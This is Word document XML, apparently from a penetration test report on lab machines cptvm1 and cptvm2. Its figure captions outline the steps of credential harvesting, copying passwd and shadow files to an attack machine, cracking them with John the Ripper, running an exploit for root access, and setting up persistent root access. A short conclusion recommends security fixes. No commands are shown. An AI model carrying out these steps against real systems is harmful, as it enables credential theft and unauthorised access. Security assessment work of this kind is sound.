        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CE2DBAA" wp14:editId="68470C8A">
            <wp:extent cx="8229600" cy="46266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2_rootCredentials.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3E924F9C" w14:textId="4FA138B6" w:rsidR="007D5E7E" w:rsidRPr="00274C21" w:rsidRDefault="00274C21" w:rsidP="00274C21">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc422058360"/>
      <w:r w:rsidRPr="00274C21">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00274C21">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00274C21">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00274C21">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00274C21">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00274C21">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Harvest cptvm2 root Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="07D40888" w14:textId="77777777" w:rsidR="00CC19FE" w:rsidRDefault="00B74D1B" w:rsidP="00CC19FE">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D74B26D" wp14:editId="7B67BBB4">
            <wp:extent cx="8229600" cy="4626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2_ftp_passwd_and_shadow.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3B654048" w14:textId="77E97858" w:rsidR="000C42AC" w:rsidRPr="00CC19FE" w:rsidRDefault="00CC19FE" w:rsidP="00CC19FE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc422058361"/>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: FTP cptvm2 passwd and shadow Files to Attack Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="2A51D342" w14:textId="77777777" w:rsidR="00CC19FE" w:rsidRDefault="00B74D1B" w:rsidP="00CC19FE">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="730BBFE5" wp14:editId="60D82A54">
            <wp:extent cx="8229600" cy="4626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2_crackPasswords.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19164FAA" w14:textId="41764B0F" w:rsidR="000C42AC" w:rsidRPr="00CC19FE" w:rsidRDefault="00CC19FE" w:rsidP="00CC19FE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc422058362"/>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use "John the Ripper" to Crack Other Passwords on cptvm2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="09274385" w14:textId="77777777" w:rsidR="00CC19FE" w:rsidRDefault="00B74D1B" w:rsidP="00CC19FE">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BD258A8" wp14:editId="335B0020">
            <wp:extent cx="822960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1_findExploit.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4505325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBA6DA1" w14:textId="3C5E126F" w:rsidR="00B74D1B" w:rsidRPr="00CC19FE" w:rsidRDefault="00CC19FE" w:rsidP="00CC19FE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc422058363"/>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Find an Exploit for cptvm1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="4F260777" w14:textId="77777777" w:rsidR="00CC19FE" w:rsidRDefault="00B74D1B" w:rsidP="00CC19FE">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76D06D0D" wp14:editId="79F161C8">
            <wp:extent cx="8229600" cy="4626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1_ftpExploit.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0DBDE62D" w14:textId="0F4C70C0" w:rsidR="00B74D1B" w:rsidRPr="00CC19FE" w:rsidRDefault="00CC19FE" w:rsidP="00CC19FE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc422058364"/>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: FTP the Exploit Source Code to cptvm1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="54DBDF23" w14:textId="77777777" w:rsidR="00CC19FE" w:rsidRDefault="00B74D1B" w:rsidP="00CC19FE">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C0B1E6" wp14:editId="12F33579">
            <wp:extent cx="8229600" cy="4626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1_buildExploit.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2C9F4BF7" w14:textId="72DEEFCD" w:rsidR="00B74D1B" w:rsidRPr="00CC19FE" w:rsidRDefault="00CC19FE" w:rsidP="00CC19FE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc422058365"/>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CC19FE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Build the Exploit on cptvm1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="50DA9498" w14:textId="77777777" w:rsidR="0018294D" w:rsidRDefault="00B74D1B" w:rsidP="0018294D">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DCC9E10" wp14:editId="6BEF326F">
            <wp:extent cx="8229600" cy="462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1_runExploit.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0432446C" w14:textId="5ECC33BF" w:rsidR="00B74D1B" w:rsidRPr="0018294D" w:rsidRDefault="0018294D" w:rsidP="0018294D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc422058366"/>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Obtaining root Access on cptvm1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="2034AF8F" w14:textId="77777777" w:rsidR="0018294D" w:rsidRDefault="00B74D1B" w:rsidP="0018294D">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45F1CF50" wp14:editId="76058CD4">
            <wp:extent cx="8229600" cy="4626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1_retainAccess.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7F220ECA" w14:textId="555FD1C4" w:rsidR="00B74D1B" w:rsidRPr="0018294D" w:rsidRDefault="0018294D" w:rsidP="0018294D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc422058367"/>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Permanently Provide root Access to Account "cptvm1" on Target cptvm1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1298DE28" w14:textId="77777777" w:rsidR="0018294D" w:rsidRDefault="00B74D1B" w:rsidP="0018294D">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49EDEFE1" wp14:editId="3436B41D">
            <wp:extent cx="8229600" cy="4626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1_prepare_passwd_and_shadow_forCapture.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568467A3" w14:textId="0280C29B" w:rsidR="00B74D1B" w:rsidRPr="0018294D" w:rsidRDefault="0018294D" w:rsidP="0018294D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc422058368"/>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prepare the passwd and shadow Files to be Copied to the Attack Machine via FTP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="68CA22E4" w14:textId="77777777" w:rsidR="0018294D" w:rsidRDefault="00B74D1B" w:rsidP="0018294D">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AA0549C" wp14:editId="737F36F7">
            <wp:extent cx="8229600" cy="4626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1_ftp_passwd_and_shadow.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22">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28BDD3A8" w14:textId="546A1611" w:rsidR="00B74D1B" w:rsidRPr="0018294D" w:rsidRDefault="0018294D" w:rsidP="0018294D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc422058369"/>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0018294D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Copy the passwd and shadow Files from cptvm1 to the Attack Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="2E4210CB" w14:textId="77777777" w:rsidR="00CD71F9" w:rsidRDefault="00B74D1B" w:rsidP="00CD71F9">
      <w:pPr>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B17EAF0" wp14:editId="504B1A78">
            <wp:extent cx="8229600" cy="4626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vm1_crackPasswords.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4626610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C47EC" w14:textId="17A395B7" w:rsidR="00B74D1B" w:rsidRPr="00CD71F9" w:rsidRDefault="00CD71F9" w:rsidP="00CD71F9">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B74D1B" w:rsidRPr="00CD71F9" w:rsidSect="007D5E7E">
          <w:pgSz w:w="15840" w:h="12240" w:orient="landscape"/>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pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc422058370"/>
      <w:r w:rsidRPr="00CD71F9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD71F9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CD71F9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CD71F9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00CD71F9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD71F9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CD71F9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use "John the Ripper" to Harvest the root (and Other) Password from cptvm1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="0C6B1941" w14:textId="54445088" w:rsidR="00AE6C4E" w:rsidRDefault="00AE6C4E" w:rsidP="000C42AC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc422058357"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CONCLUSION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="3F60B3D7" w14:textId="6B6B8404" w:rsidR="00AE6C4E" w:rsidRPr="00204DD5" w:rsidRDefault="00AB13BF" w:rsidP="00204DD5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We found the systems we tested to be very unsecure. We strongly recommend following the steps we’ve outlined to secure the system. Furthermore, a person or organization with </w:t>
      </w:r>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>expert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> knowledge in the areas of cybersecurity and Information Assurance (IA) should be retained to ensure property security of your information assets going forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE00576" w14:textId="36960B1F" w:rsidR="00AE6C4E" w:rsidRDefault="00AE6C4E" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Ref422055287"/>
      <w:bookmarkStart w:id="24" w:name="_Toc422058358"/>
      <w:r>
        <w:t>APPENDIX</w:t>
      </w:r>
      <w:r w:rsidR="000B6516">
        <w:t xml:space="preserve"> 1: Definitions</w:t>
      </w:r>
